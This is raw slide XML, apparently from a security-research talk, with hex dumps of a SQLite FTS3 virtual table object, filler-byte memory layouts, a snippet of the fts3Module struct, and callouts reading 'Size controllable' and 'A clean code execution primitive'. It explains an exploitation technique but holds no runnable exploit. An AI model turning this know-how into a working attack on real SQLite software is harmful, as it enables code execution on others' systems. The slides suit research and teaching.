                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>43 43 43 43 43 43 43 43 43 43 43 43 43 43 43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44</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 44 44 44 44 44 44 44 44 44 44 44 44 44 44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45</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 45 45 45 45 45 45 45 45 45 45 45 45 45 45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46</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 46 46 46 46 46 46 46 46 46 46 46 46 46 46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47</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 47 47 47 47 47 47 47 47 47 47 47 47 47 47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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083554" y="1690335"/>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083554" y="5281260"/>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962562" y="1416154"/>
            <a:ext cx="2609937" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ts3 Virtual Table object</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2511093847"/>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6185808" y="1747097"/>
            <a:ext cx="4853666" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>58 24 A2 43 AA 7F 00 00 00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 10 21 FA 01 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10 43 B1 20 C3 21 00 00 20 43 B1 20 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>01 00 00 00 00 00 00 00 08 42 54 A4 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>43 43 43 43 43 43 43 43 43 43 43 43 43 43 43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44</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 44 44 44 44 44 44 44 44 44 44 44 44 44 44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45</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 45 45 45 45 45 45 45 45 45 45 45 45 45 45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46</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 46 46 46 46 46 46 46 46 46 46 46 46 46 46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47</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 47 47 47 47 47 47 47 47 47 47 47 47 47 47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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083554" y="1690335"/>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083554" y="5281260"/>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962562" y="1416154"/>
            <a:ext cx="2609937" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ts3 Virtual Table object</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240558" y="3505200"/>
            <a:ext cx="4713192" cy="148590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TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6877243" y="5765902"/>
            <a:ext cx="3437461" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column names of the virtual table</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8595974" y="4991100"/>
            <a:ext cx="1180" cy="774802"/>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5208559"/>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6185808" y="1747097"/>
            <a:ext cx="4853666" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>58 24 A2 43 AA 7F 00 00 00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 10 21 FA 01 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10 43 B1 20 C3 21 00 00 20 43 B1 20 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>01 00 00 00 00 00 00 00 08 42 54 A4 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>43 43 43 43 43 43 43 43 43 43 43 43 43 43 43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44</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 44 44 44 44 44 44 44 44 44 44 44 44 44 44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45</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 45 45 45 45 45 45 45 45 45 45 45 45 45 45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46</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 46 46 46 46 46 46 46 46 46 46 46 46 46 46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47</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 47 47 47 47 47 47 47 47 47 47 47 47 47 47 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083554" y="1690335"/>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083554" y="5281260"/>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962562" y="1416154"/>
            <a:ext cx="2609937" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ts3 Virtual Table object</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240558" y="1804147"/>
            <a:ext cx="4713192" cy="3410827"/>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TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2504278" y="3193404"/>
            <a:ext cx="2176010" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Size controllable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4680288" y="3424236"/>
            <a:ext cx="1560270" cy="1"/>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4586208"/>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TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310140" y="3193404"/>
            <a:ext cx="4564285" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>A clean code execution primitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6176865" y="1103737"/>
            <a:ext cx="4795935" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>static</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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>const</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sqlite3_module</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fts3Module</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>xDisconnect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>   */</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fts3DisconnectMethod,</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
